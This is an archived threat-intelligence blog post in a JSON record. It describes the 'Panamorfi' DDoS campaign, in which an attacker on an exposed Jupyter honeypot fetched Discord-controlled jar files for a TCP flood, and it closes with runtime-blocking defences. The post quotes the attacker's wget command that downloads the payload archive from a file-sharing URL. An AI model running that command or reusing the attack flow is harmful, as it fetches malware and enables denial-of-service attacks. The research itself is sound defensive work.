{
	"id": "2a6f8194-ae54-4ab0-8028-2d141b641923",
	"created_at": "2026-04-10T03:21:44.691322Z",
	"updated_at": "2026-04-10T03:22:18.759293Z",
	"deleted_at": null,
	"sha1_hash": "9d58188aadf1012ce230e23ad86ae8ace7ccd1f2",
	"title": "Panamorfi: A New Discord DDoS Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3160385,
	"plain_text": "Panamorfi: A New Discord DDoS Campaign\r\nBy Assaf Morag\r\nPublished: 2024-08-02 · Archived: 2026-04-10 03:15:44 UTC\r\nAqua Nautilus researchers uncovered a new Distributed Denial of Service (DDoS) campaign dubbed ‘Panamorfi’,\r\nutilizing the Java written minecraft DDoS package – mineping – the threat actor launches a DDoS. Thus far we’ve\r\nonly seen it deployed via misconfigured Jupyter notebooks. In this blog we explain about this attack, the\r\ntechniques used by the threat actor and how to protect your environments.\r\nAttack flow\r\nThe threat actor ‘yawixooo’ gained initial access on our exposed to the world Jupyter notebook honeypot. Then\r\nran the following command:\r\n‘wget https://filebin.net/archive/h4fhifnlykw224h9/zip’\r\nThey downloaded a zip file with a random name h4fhifnlykw224h9 that was new on Virus Total and only had 1\r\ndetection by ESET. This zip file (MD5: 42989a405c8d7c9cb68c323ae9a9a318) size is ~17 MB and contains 2\r\nJar  files.\r\nFigure 1: The zip file with a single detection\r\nhttps://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/\r\nPage 1 of 7\n\nThese two Jar  files were also new in VT and only had 1 detection each by ESET.\r\nFigure 2: The conn.jar file with a single detection\r\nFigure 3: The mineping.jar file with a single detection\r\nThe connector Jar file contains the initial execution code. As depicted below in the main function the threat actor\r\nis utilizing Discord to control the DDoS attack. The victims machine is connecting the Discord channel using the\r\nhttps://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/\r\nPage 2 of 7\n\ncredentials specified below.\r\nFigure 4: The main function of connector jar\r\nIt is loading mineping.jar  which is a known DDoS minecraft server, and its code is available on GitHub. You\r\ncan see in the code loading of the mineping.jar  package in order to launch a TCP flood DDoS attack. This\r\nattack aims to consume the resources of the target server by sending a large number of TCP connection requests.\r\nThe results are written to the Discord channel.\r\nFigure 5: The function that updates the Discord channel\r\nYou can also see the threat actor identifies as ‘yawixooo’, loading a signature photo, enclosed below.\r\nhttps://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/\r\nPage 3 of 7\n\nFigure 6: The Panamorfi DDoS logo\r\nThe package mineping.jar contains 12 java files, that enable among other loading http socket, using a proxy,\r\nflooding a victim, and creation of random connection details.\r\nThe threat actor\r\nThe threat actor identified themselves in the code as ‘yawixooo,’ which can be found on GitHub. During our\r\ninvestigation, it appears that the public repository is active. It contains a Minecraft server configuration and an\r\nHTML page that is currently under construction.\r\nhttps://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/\r\nPage 4 of 7\n\nFigure 7: The GitHub profile of the threat actor\r\nFigure 8: The website of the threat actor under construction\r\nhttps://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/\r\nPage 5 of 7\n\nDetection and remediation with Aqua’s CNAPP\r\nIn this blog we covered an attack against a Jupyter notebook. Usually, data practitioners such as data engineers,\r\ndata analysts and data scientists are the ones who use these kinds of applications. Data practitioners often lack the\r\nknowledge and understanding; thus, they sometimes open room for misconfigurations or vulnerabilities.\r\nIn this case, we leveraged Aqua’s Runtime Protection solution to detect the drift event and block its execution.\r\nAqua’s advanced behavioral detection capabilities identify malicious or suspicious behavior in runtime and the\r\ngranular runtime policies effectively block the events in real time. While vulnerability management and\r\nmisconfiguration remediation are important for an overall cloud native security posture, we must assume that an\r\nattacker can gain access by exploiting a zero-day or unpatched vulnerability or misconfiguration.\r\nIn this attack the next link in the attack kill chain (after the misconfiguration) is the payload. We assume that we\r\ncan limit our data practitioners from executing anything out of the scope of the Jupyter notebook. Thus, we set our\r\ncontrols to block as can be seen in Figure 9 below.\r\nFigure 9: The Jupyter notebook container runtime policy is set to block any drift (attempt to run executable not in\r\nthe original image)\r\nAs you can see in Figure 10 below, our runtime policy blocks the file conn.jar from running. This de facto kills the\r\nentire attack.\r\nhttps://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/\r\nPage 6 of 7\n\nFigure 10: Aqua’s runtime protection completely blocks the attack before it even started\r\nAssaf is the Director of Threat Intelligence at Aqua Nautilus. He is responsible of acquiring threat intelligence\r\nrelated to software development life cycle in cloud native environments, supports the team's data needs, and helps\r\nAqua and the ecosystem remain at the forefront of emerging threats and protective methodologies. His research\r\nhas been featured in leading information security publications and journals worldwide, and he has presented at\r\nleading cybersecurity conferences. Notably, Assaf has also contributed to the development of the new MITRE\r\nATT\u0026CK Container Framework.\r\nAssaf is leading an O’Reilly course, focusing on cyber threat intelligence in cloud-native environments. The\r\ncourse covers both theoretical concepts and practical applications, providing valuable insights into the unique\r\nchallenges and strategies associated with securing cloud-native infrastructures.\r\nSource: https://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/\r\nhttps://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/"
	],
	"report_names": [
		"panamorfi-a-new-discord-ddos-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775791304,
	"ts_updated_at": 1775791338,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9d58188aadf1012ce230e23ad86ae8ace7ccd1f2.pdf",
		"text": "https://archive.orkl.eu/9d58188aadf1012ce230e23ad86ae8ace7ccd1f2.txt",
		"img": "https://archive.orkl.eu/9d58188aadf1012ce230e23ad86ae8ace7ccd1f2.jpg"
	}
}